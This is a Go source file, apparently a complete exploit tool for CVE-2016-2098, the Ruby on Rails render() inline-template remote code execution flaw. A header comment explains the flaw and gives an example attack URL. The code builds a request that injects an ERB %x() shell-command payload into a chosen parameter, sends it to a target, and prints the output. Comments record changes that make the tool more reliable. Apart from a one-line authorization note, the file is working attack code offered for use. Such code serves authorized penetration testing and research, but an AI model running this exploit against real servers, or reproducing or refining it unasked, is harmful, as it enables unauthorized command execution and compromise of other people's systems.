package main
/*
*****************************************
CVE-2016-2098 - Ruby on Rails render() inline-template RCE
*****************************************
This vulnerability lies in the way Ruby on Rails passes request parameters to render() when generating
web content: a hash supplied under a vulnerable parameter (e.g. id[inline]) is accepted as render options,
and the "inline" option is an ERB template that is evaluated on the server. Supplying an ERB tag such as
<%= %x(cmd) %> through that parameter therefore yields remote code execution.
Example:
http://vulnerable.lan/pages?id=1
To attack that page you would request:
http://vulnerable.lan/pages?id[inline]=<%25= %25x(SHELLCOMMANDHERE) %25>
(%25 is a percent-encoded "%", so after URL decoding the server sees <%= %x(SHELLCOMMANDHERE) %>.)
This causes SHELLCOMMANDHERE to be executed in a shell on the remote server; its output is returned in the
rendered page. Only use this against systems you are authorized to test.
This exploit script was written by zc00l at 09/02/2018 - 13:42
This code is authored by ANDRE LUIS ALBINO DE MORAES MARQUES - @zc00l - [email protected]
*/
import (
	"flag"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"os"
	"time"
)
// Command-line flags. -target and -parameter have no default and must be
// supplied by the operator; -command falls back to the harmless "id".
var (
	target    = flag.String("target", "", "Vulnerable web-server page")
	parameter = flag.String("parameter", "", "Vulnerable parameter")
	command   = flag.String("command", "id", "Command to be executed in the remote target")
)
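// exploit sends a single GET to requestURL (the fully built attack URL) and
// prints the raw response body, which is where the output of the injected
// command appears if the target is vulnerable.
//
// Compared with the first version this bounds the request with a timeout
// (a command that blocks on the target would otherwise hang the tool for
// good), checks the ReadAll error instead of discarding it, and reports a
// non-2xx status so a 404/500 is distinguishable from "command produced no
// output". The parameter was renamed from "url" because that shadowed the
// net/url package. Transport errors are fatal: the process exits with 1.
func exploit(requestURL string) {
	// 30s is generous for a page render but still ends a hung connection.
	client := &http.Client{Timeout: 30 * time.Second}

	resp, err := client.Get(requestURL)
	if err != nil {
		fmt.Printf("\033[091m[!]\033[0m Error sending request: %s\n", err)
		os.Exit(1)
	}
	defer resp.Body.Close()

	// A non-2xx answer usually means the route or parameter is wrong rather
	// than that the command ran silently -- say so before dumping the body.
	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
		fmt.Printf("\033[091m[!]\033[0m Unexpected HTTP status: %s\n", resp.Status)
	}

	content, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Printf("\033[091m[!]\033[0m Error reading response: %s\n", err)
		os.Exit(1)
	}
	// The body goes to stdout (like the banner) so it can be piped; the
	// builtin println used before wrote it to stderr.
	fmt.Println(string(content))
}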
// header prints the one-line banner shown before any other output.
func header() {
	const banner = "zc00l exploit to get RCE in CVE-2016-2098\n"
	fmt.Print(banner)
}
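// main wires the flags to the request: it checks that the operator supplied
// a target and a parameter, builds the attack URL and fires it.
//
// Fixes over the original: missing -target/-parameter are rejected with a
// usage message instead of producing a request to "?..." that fails with an
// obscure transport error; the URL is assembled with net/url so a target
// that already carries a query string is extended with "&" instead of
// getting a second "?"; and the status lines go to stdout via fmt like the
// banner, rather than to stderr via the builtin println.
func main() {
	header()
	flag.Parse()

	if *target == "" || *parameter == "" {
		fmt.Printf("\033[091m[!]\033[0m -target and -parameter are required\n")
		flag.Usage()
		os.Exit(2)
	}

	fmt.Printf("\033[092m[+]\033[0m Vulnerable page set to: %s\n", *target)
	fmt.Printf("\033[092m[+]\033[0m Vulnerable parameter set to: %s\n", *parameter)
	fmt.Printf("\033[092m[+]\033[0m Command to be executed: %s\n", *command)

	exploitURL, err := buildExploitURL(*target, *parameter, *command)
	if err != nil {
		fmt.Printf("\033[091m[!]\033[0m Invalid target URL: %s\n", err)
		os.Exit(1)
	}
	exploit(exploitURL)
}

// buildExploitURL returns target with "<parameter>[inline]=<%= %x(command) %>"
// added as a query parameter -- the CVE-2016-2098 trigger: the hash Rails
// builds from parameter[inline] reaches render(), which treats the value as
// an ERB template and evaluates %x() on the server.
//
// Existing query parameters on target are preserved. command is inserted
// verbatim inside %x( ... ), so a ')' in it ends the backtick expression
// early and shell metacharacters are interpreted by the remote shell; quote
// accordingly. Returns an error only if target does not parse as a URL.
func buildExploitURL(target, parameter, command string) (string, error) {
	u, err := url.Parse(target)
	if err != nil {
		return "", fmt.Errorf("parsing target %q: %v", target, err)
	}
	q := u.Query()
	// Values.Encode percent-encodes "[", "]", "<", "%" and "(" and turns the
	// spaces into "+", all of which Rack decodes back before Rails sees them.
	q.Set(parameter+"[inline]", "<%= %x("+command+") %>")
	u.RawQuery = q.Encode()
	return u.String(), nil
}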